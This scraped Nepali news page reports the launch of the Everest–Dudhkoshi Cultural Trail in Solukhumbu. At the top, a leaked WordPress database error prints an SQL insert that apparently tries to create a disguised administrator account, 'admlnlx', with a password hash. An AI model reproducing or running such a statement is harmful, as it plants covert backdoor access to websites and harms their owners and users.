WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUKey9f9HmLcqVMbs9Q1OdaXsR5NpT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 20:34:18', '', 'admlnlx', 'admlnlx')

नयाँ पर्यटकीय पदमार्ग ‘एभरेस्ट–दुधकोशी कल्चरल ट्रेल’को औपचारिक सुरुवात – Gaule Khabar

नयाँ पर्यटकीय पदमार्ग ‘एभरेस्ट–दुधकोशी कल्चरल ट्रेल’को औपचारिक सुरुवात

नयाँ पर्यटकीय पदमार्ग ‘एभरेस्ट–दुधकोशी कल्चरल ट्रेल’को औपचारिक सुरुवात

सोलुखुम्बु । सोलुखुम्बुको माप्य दुधकोशी गाउँपालिकाले नयाँ पर्यटकीय पदमार्ग “एभरेस्ट–दुधकोशी कल्चरल ट्रेल”को औपचारिक सुरुवात गरिएको छ ।

नेपाल पर्यटन बोर्ड तथा ट्रेकिङ एजेन्सिज एशोसियसन अफ नेपाल (टान) को सहकार्यमा संचालित जीविकोपार्जन पुर्नउत्थानका लागि दिगो पर्यटन (STLRP) को आर्थिक सहयोगमा निर्माण गरिएको सो पदमार्गको काठमाडौंको भृकुटीमण्डपस्थित पर्यटन बोर्डमा सोमबार आयोजित कार्यक्रममा प्रमुख अतिथि रक्षामन्त्री मानबीर राईले पानसमा बत्ती बालेर औपचारिक सुरुवात गरेका हुन् ।

गाउँपालिका अध्यक्ष बुद्धिकिरण राईको अध्यक्षतामा सम्पन्न कार्यक्रममा सो पदमार्गसम्बन्धी वृत्तचित्र, आइटेनरी तथा प्रचारमूलक सामाग्रीहरू समेत सार्वजनिक गरिएको थियो । सिलगुढी डाँडाबाट सुरु हुने ट्रेलमा घुम्ने मेरा हुँदै सुन्दर प्राकृतिक भ्यु पोइन्ट तथा जङ्गलहरू छिचोल्दै राप्छा, बासा, खास्ताप, काँकु र जुभिङ तथा वाकुलाई समेत समेटेको कार्यक्रममा जानकारी गराईएको थियो । सो पर्टकीय पदमार्ग ५ देखि ९ दिनसम्मको अवधिमा पुरा गर्न सकिने बताईएको छ ।

ट्रेकिङ एजेन्सीज एशोसिएसन अफ नेपाल (टान) का महासचिब सोनाम ग्याल्जेन शेर्पाले स्वागत मन्तव्य व्यक्त गरेको सो कार्यक्रममा मन्त्री राईसहित नेपाल पर्यटन बोर्डका सीइओ दिपक राज जोशी, टानका अध्यक्ष सागर पाण्डे, वरिष्ठ उपाध्यक्ष कर्मा शेर्पा, पूर्ब अध्यक्ष खुम सुवेदी, पूर्ब प्रथम उपाध्यक्ष चोलेन्द्र कार्की, पर्यटन बोर्डका निर्देशक हिमाल गौतम, शेर्पा पर्यटन ब्यबसायी संघका अध्यक्ष पासाङ शेर्पा लगायत पर्यटन ब्यबसायी र सोलुखुम्बु जिल्लाका राजनीतिकर्मीहरुको उपस्थिति रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका